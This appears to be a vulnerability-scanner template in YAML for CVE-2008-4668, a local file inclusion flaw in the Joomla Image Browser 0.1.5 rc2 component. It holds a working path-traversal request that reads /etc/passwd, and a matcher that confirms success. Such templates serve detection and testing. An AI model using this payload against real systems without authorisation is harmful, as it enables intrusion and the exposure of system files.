34 lines
1016 B
YAML
34 lines
1016 B
YAML
id: CVE-2008-4668
|
|
|
|
info:
|
|
name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/6618
|
|
- http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/
|
|
- http://securityreason.com/securityalert/4464
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-4668
|
|
classification:
|
|
cve-id: CVE-2008-4668
|
|
tags: cve,cve2008,joomla,lfi,edb
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/07/06
|